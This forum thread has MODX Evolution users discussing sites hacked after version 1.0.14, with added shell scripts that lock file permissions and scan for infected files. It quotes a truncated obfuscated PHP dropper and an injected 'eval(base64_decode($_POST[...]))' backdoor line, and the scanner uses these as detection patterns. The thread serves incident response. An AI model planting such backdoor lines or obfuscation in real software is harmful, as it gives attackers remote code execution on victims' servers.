  • Quote from: gallenkamp at Oct 14, 2014, 09:59 PM
    I really recommend that tool "maldet" if you have shell access and can install Linux stuff.

    Thank you for that recommendation. If you have to install it on Ubuntu, this (German) howto has some advice (tmpwatch is replaced by tmpreaper etc.).
      • 28107
      • 230 Posts
      Got another site hacked, and it was an absolutely clean update after that 1.0.14 site was hacked. We checked all files before updating, removed nearly all plugins (it's a nearly static page), and got files in the manager /includes like

      <?php $r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] = 
      .....

      The file was dated 10.10.2014.

      Update: files within /modules/docmanager/lang/ are also modified with
      eval(base64_decode($_POST['ne1bfba']));?><?php ....
        CONIN Werbeagentur . Köln
        http://www.conin.de
        • 49185
        • 11 Posts
        Quote from: spackko at Oct 24, 2014, 05:49 AM
        [...], and got files in the manager /includes like

        Two things:
        1. Make sure you rename the ht.access to .htaccess (otherwise, server rewrites are active, which is bad if someone can hack MODX via http).
        2. Since nothing in the manager directory is ever supposed to get modified by anything or anyone (apart from the config file during install), remove write permissions from the manager folder and files after the installation. After that, no malicious code can be placed in the manager folder. Many hosters have far too loose default permissions when uploading files.

        PS: You are from Cologne? I live near Koblenz.
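One way to carry out the second point of timo_w's post, as an added example that is not code from this thread or from MODX: a POSIX shell script that makes the manager tree read-only after installation and then lists anything under it that is still writable. It assumes the site root is passed as the first argument and that the files are owned by the account running the script; the function names are the editor's.

```shell
#!/bin/sh
# Added example (not from the thread): remove write permission from a MODX Evo
# "manager" tree after installation, then list anything still writable.
# Assumes: site root is $1, and the files are owned by the account running
# this script (otherwise chmod fails and find reports the failure).

# Print every entry under $1 that has any write bit set.
# Octal -perm tests are POSIX: -200 owner write, -020 group write, -002 other write.
list_writable() {
    find "$1" \( -perm -200 -o -perm -020 -o -perm -002 \) -print | sort
}

# Make the manager tree read-only: directories 555, files 444.
# The config file written during install is inside this tree and gets the
# same treatment, which is what the post asks for once installation is done.
lock_manager() {
    root="$1"
    [ -d "$root/manager" ] || { echo "no manager/ under $root" >&2; return 1; }
    find "$root/manager" -type d -exec chmod 555 {} +
    find "$root/manager" -type f -exec chmod 444 {} +
}

# Number of writable entries left under manager/ (expected: 0 after lock_manager).
count_writable() {
    list_writable "$1/manager" | wc -l | tr -d ' '
}

# Usage: sh lock_manager.sh /var/www/site
if [ -n "$1" ]; then
    lock_manager "$1" && echo "writable entries under manager/: $(count_writable "$1")"
fi
```

Two caveats a practitioner should keep in mind. First, on hosts where PHP runs as the same account that owns the files, an attacker's PHP code can call chmod() and undo this, so the read-only bits stop a dropper that merely writes files but not a shell that is already executing as that user. Second, the MODX upgrade writes into manager/, so the lock has to be lifted before an update and reapplied afterwards.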
        • Quote from: spackko at Oct 24, 2014, 05:49 AM
          got another site hacked. and it was an absolute clean update after that 1.0.14 site was hacked.

          Do you have any access log for this?
            • 28107
            • 230 Posts
            Quote from: Jako at Oct 24, 2014, 09:28 AM
            Quote from: spackko at Oct 24, 2014, 05:49 AM
            got another site hacked. and it was an absolute clean update after that 1.0.14 site was hacked.

            Do you have any access log for this?

            will check that later
              CONIN Werbeagentur . Köln
              http://www.conin.de
              • 28173
              • 409 Posts
               It looks like several of us have had the same problem for 2 months.
               I can understand that this problem is hard to solve.
               I'm trying to use the Linux tool maldet to detect any malware in the Evo directory, but I haven't found anything so far.

               Now my server is grey/blacklisted because of spam, and I'm thinking of moving all Evo websites to another dedicated server. But of course, that's not the solution. Another "issue" is to "upgrade" these websites to Revo, but that's also a lot of work...

               I don't know how I can help the dev team find the issue.
               I'm not sure that log file analysis is a solution, because the creation timestamp of an incriminated file can also be changed by the malware...
                • 49185
                • 11 Posts
                I'm pretty sure the security flaw has been fixed in 1.0.15, which was released a couple of days ago.
                  • 28173
                  • 409 Posts
                  Oh! I missed this new version!
                  I will update all my Evo websites within the hour.
                  I will come back here if the problem still occurs...
                    • 28173
                    • 409 Posts
                    Evo websites updated to 1.0.15.
                    Wait and see.

                    I also began a big cleanup of all the bullshit by searching in full text for these strings:

                    • ="stop_"
                    • eval(base64_decode($_POST[
                    • =strtoupper(

                    I looked twice before deleting, but the results are quite good (2-3% false positives).
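The three strings above, together with the character-index concatenation seen in the manager/includes sample earlier in the thread ($r76[94].$r76[24].$r76[24]...), can be turned into a repeatable scan. The following is an added example in POSIX shell, not code from the thread or from MODX. The indicator list and the regex for the concatenation pattern are the editor's, and as with pelvard's search they will produce some false positives, so the output is a review list, not a delete list. A mtime-based helper is included separately, since the thread itself notes that a timestamp can be forged.

```shell
#!/bin/sh
# Added example (not from the thread): scan a web root for PHP files that
# carry the indicator strings discussed in the thread.
# Assumption: site root is $1. Indicator list and regex are the editor's.

# Fixed-string indicators, one per line. grep -F treats ( [ $ " literally,
# and a newline-separated list is a list of patterns to grep.
INDICATORS='eval(base64_decode($_POST[
="stop_"
=strtoupper('

# ERE for a string built from single characters of one array, three or more
# terms joined with ".", e.g.  $r76[94].$r76[24].$r76[24].$r76[49]
CONCAT_RE='\$[A-Za-z_][A-Za-z0-9_]*\[[0-9]+\]\.(\$[A-Za-z_][A-Za-z0-9_]*\[[0-9]+\]\.){2,}'

# Print the path of every .php file under $1 matching any indicator, once each.
# "|| true" keeps a no-match exit status (1) from aborting a caller using set -e.
scan_php() {
    {
        find "$1" -type f -name '*.php' -exec grep -l -F -e "$INDICATORS" {} + || true
        find "$1" -type f -name '*.php' -exec grep -l -E -e "$CONCAT_RE" {} + || true
    } | sort -u
}

# .php files modified in the last $2 days. A forged mtime makes this a hint
# only, which is why it is not folded into scan_php.
recent_php() {
    find "$1" -type f -name '*.php' -mtime "-$2" -print | sort
}

# Usage: sh scan.sh /var/www/site
if [ -n "$1" ]; then
    echo "== indicator hits =="; scan_php "$1"
    echo "== .php changed in the last 7 days =="; recent_php "$1" 7
fi
```

Files reported by scan_php should be diffed against the same file in a clean MODX Evo release of the installed version before anything is deleted; files that exist only on the server (no counterpart in the release) are the likely drops.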
                      • 37909
                      • 153 Posts
                      Hello everybody!

                      I have the same issues. Only .php files are added or modified. I deleted all the files, but I have been attacked again. Sorry, but these jerks p** me off. Sorry again.

                      So, does Jako's script work? http://forums.modx.com/thread/93126/some-of-my-modx-1-0-14-are-hacked?page=3#dis-post-512097
                      And timo_w's snippet? http://forums.modx.com/thread/93126/some-of-my-modx-1-0-14-are-hacked?page=5#dis-post-512660